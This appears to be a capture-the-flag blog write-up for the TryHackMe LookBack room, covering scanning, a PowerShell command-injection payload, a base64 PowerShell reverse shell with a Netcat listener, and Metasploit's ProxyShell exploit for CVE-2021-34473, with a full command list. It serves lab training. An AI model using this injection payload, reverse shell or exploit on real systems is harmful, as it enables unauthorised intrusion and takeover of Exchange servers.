We covered a scenario where we performed a vulnerability scanning with Nikto on a vulnerable windows machine that led to a full compromise using Microsoft Exchange CVE-2021-34473. This was part of TryHackMe LookBack.

The Lookback company has just started the integration with Active Directory. Due to the coming deadline, the system integrator had to rush the deployment of the environment. Can you spot any vulnerabilities?

Initial Reconnaissance

I started with an Nmap scan to identify open ports. The scan revealed ports 80 (HTTP), 135, 139, 443 (HTTPS), 593, and RDP were open. The Nmap output also showed a DNS name for the machine, which I added to my local /etc/hosts file.

Web Enumeration

I first tried accessing the web server on port 80, but it didn’t respond. Switching to port 443 (HTTPS), I encountered a security warning, accepted the risk, and was presented with an Outlook login page. To find other directories, I used Gobuster (gobuster dir) to enumerate directories on the HTTPS server. I had to use the -k option to ignore SSL certificate errors and --exclude-length 0 to exclude results with a length of zero. Gobuster found a /test directory which prompted for a username and password.

Vulnerability Scanning & Initial Access

Recalling the challenge description about vulnerability scanning, I ran Nikto against the web server on port 80, specifying the host with -h. The Nikto scan output revealed the credentials admin:admin. Using these credentials on the /test directory’s login prompt, I gained access and found the first flag.

Command Injection

The page after login had an input field. I tested for command injection. Inputting a single quote revealed a PowerShell error, indicating the backend used PowerShell and the input was missing a terminator. Inputting double quotes revealed another error related to Get-Content, showing how the input was being inserted into a file path.

To execute commands, I crafted a payload to close the Get-Content command and then pipe my own commands. A working payload for whoami was ') | whoami ; ('. This confirmed command execution as the user admin.

Reverse Shell & User Flag

I generated a PowerShell base64 encoded reverse shell payload using an online tool. I customized the payload with my IP address and a listening port (4545). I set up a Netcat listener (nc -lvnp 4545). I pasted the reverse shell payload into the command injection input field and executed it, successfully receiving a shell. Navigating to C:\Users\Dev\Desktop, I found the user flag (user.txt) and also a todo.txt file.

Privilege Escalation (Exploiting MS Exchange)

The todo.txt file mentioned a pending security update for MS Exchange, indicating a potential vulnerability. I launched Metasploit (msfconsole) and searched for Exchange exploits (search exchange type:exploit). I selected a relevant exploit: exploit/windows/http/exchange_proxyshell_rce.

I configured the exploit options:

  • set EMAIL infra@lookback.thm (or a similar email from notes)
  • set RHOSTS <target_ip>
  • set LPORT 4546
  • set LHOST <my_ip>

Running the exploit (run or exploit) initially seemed to fail but then opened a session. I interacted with the new session (sessions -i <session_id>) and got a shell. Navigating to C:\Users\Administrator\Documents, I found the root flag (flag.txt). The exploit leveraged CVE-2021-34473, a Microsoft Exchange Server remote code execution vulnerability.

Technical Commands

Here are the technical commands I used:

  • nmap <target_ip>
  • sudo nano /etc/hosts
  • gobuster dir -u https://<target_ip_or_dns> -w /usr/share/wordlists/dirbuster/common.txt -k --exclude-length 0
  • nikto -h http://<dns_name>
  • ') | whoami ; (' (for command injection)
  • powershell -e <base64_encoded_payload> (for reverse shell)
  • nc -lvnp 4545
  • whoami (inside the reverse shell)
  • cd C:\Users\Dev\Desktop
  • type user.txt
  • type todo.txt
  • msfconsole
  • search exchange type:exploit
  • use exploit/windows/http/exchange_proxyshell_rce
  • show options
  • set EMAIL infra@lookback.thm
  • set RHOSTS <target_ip>
  • set LPORT 4546
  • set LHOST <attacker_ip>
  • run or exploit
  • sessions -i <session_id>
  • shell (inside Metasploit session)
  • cd C:\Users\Administrator\Documents
  • type flag.txt

TryHackMe LookBack Room Answers

What is the service user flag?
What is the user flag?
What is the root flag?

Video Walkthrough

, , , , ,
Show Comments

The MasterMinds Notes

About the Author

Mastermind Study Notes is a group of talented authors and writers who are experienced and well-versed across different fields. The group is led by, Motasem Hamdan, who is a Cybersecurity content creator and YouTuber.

View Articles